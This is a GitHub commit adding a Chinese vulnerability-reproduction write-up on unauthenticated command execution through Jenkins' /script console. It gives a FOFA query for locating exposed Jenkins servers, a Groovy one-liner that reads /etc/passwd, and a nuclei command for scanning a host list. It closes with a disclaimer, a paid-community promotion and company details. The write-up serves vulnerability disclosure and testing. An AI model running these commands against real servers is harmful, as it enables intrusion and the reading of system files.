-
Notifications
You must be signed in to change notification settings - Fork 401
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Upload new file: 漏洞复现 Jenkins script 远程命令执行漏洞.md via simpread
- Loading branch information
Showing
1 changed file
with
63 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/ypYSNrccGvA519wMdThocw) | ||
**0x01 漏洞描述** | ||
|
||
Jenkins 是一个流行的开源持续集成和交付工具, 它提供了一个可扩展的插件生态系统, 可以用于自动化构建、测试和部署软件项目。Jenkins 系统 / script 存在未授权远程命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。 | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/GWXBjgPE49zY6xd4CwYTQ9nQf0KrAGfDiazv5810hkJlU8zJpP94KtiaNz5EQcOYicngy3EjG3PBLxicC86K3LrZdg/640?wx_fmt=png) | ||
|
||
**0x02 漏洞复现** | ||
|
||
**fofa****:**app="Jenkins" | ||
|
||
1. 进入 /script 页面,执行 cat /etc/passwd 得到回显 | ||
|
||
``` | ||
/script | ||
println 'cat /etc/passwd'.execute().text | ||
``` | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/GWXBjgPE49zY6xd4CwYTQ9nQf0KrAGfDbkHzq8Nt6RvJvhJA1cY3SiczKxSFOtrZ5BmicfQnicF6Qep7QOdathapQ/640?wx_fmt=png) | ||
|
||
2.nuclei 验证脚本已发表于知识星球 | ||
|
||
``` | ||
nuclei.exe -t jenkins-script-unauth-rce.yaml -l subs.txt -stats | ||
``` | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/GWXBjgPE49zY6xd4CwYTQ9nQf0KrAGfDPWW7qicnnqeggvxyDcxsBwVsDYKGY37OsBEl5ScHUrd06bXZnaDzfmg/640?wx_fmt=png) | ||
|
||
**(注:本文章为技术分享,禁止任何非授权攻击行为****)** | ||
|
||
**网络安全神兵利器分享** | ||
|
||
**网络安全漏洞 N/0day 分享** | ||
|
||
**加入星球请扫描下方二维码,更多精,敬请期待!** | ||
|
||
👇👇👇 | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_jpg/GWXBjgPE49zs4eNkNzwGvylxKjRnH2aibQqdbEUPicwHRpyuIhk7YdcECWw9kZGCibot3aRDzS4ADTmywx57c7QBw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1) | ||
|
||
**0x04 ****公司简介****** | ||
|
||
江西渝融云安全科技有限公司,2017 年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。 | ||
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获 2020 年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党 100 周年活动信息安全应急保障优秀案例等荣誉...... | ||
|
||
**编制:sm** | ||
|
||
**审核:fjh** | ||
|
||
**审核:Dog** | ||
|
||
****1 个![](https://mmbiz.qpic.cn/mmbiz_png/HrawmEuibfaIOiabAXdibIZicf2jWoboub7W1iap9PibRDKPpsdzMPM0daU2P2ibkhXDeic6LtWR71PlAmzE1Z6Ux6YdTQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)** 1 朵************![](https://mmbiz.qpic.cn/mmbiz_gif/0y9ibmULDTbBkmr06X1rtjETLFiaNJgiczQRMlsic03HkL1frCDcicujqskG8fzOuCq4IQo9JRqzV9bRphg4lE74zJQ/640?wx_fmt=gif&wxfrom=5&wx_lazy=1)************** **5 毛钱** | ||
|
||
**天天搬砖的小 M** | ||
|
||
**能不能吃顿好的** | ||
|
||
**就看你们的啦** | ||
|
||
****![](https://mmbiz.qpic.cn/mmbiz_gif/HrawmEuibfaJtxalqIebTNSQbkflPG4vahmibDLYmNfjnOptwGv0NBQCdXxEcicN4Q08q9nkX86b5rkDSpXUZ6RWg/640?wx_fmt=gif&wxfrom=5&wx_lazy=1)**** |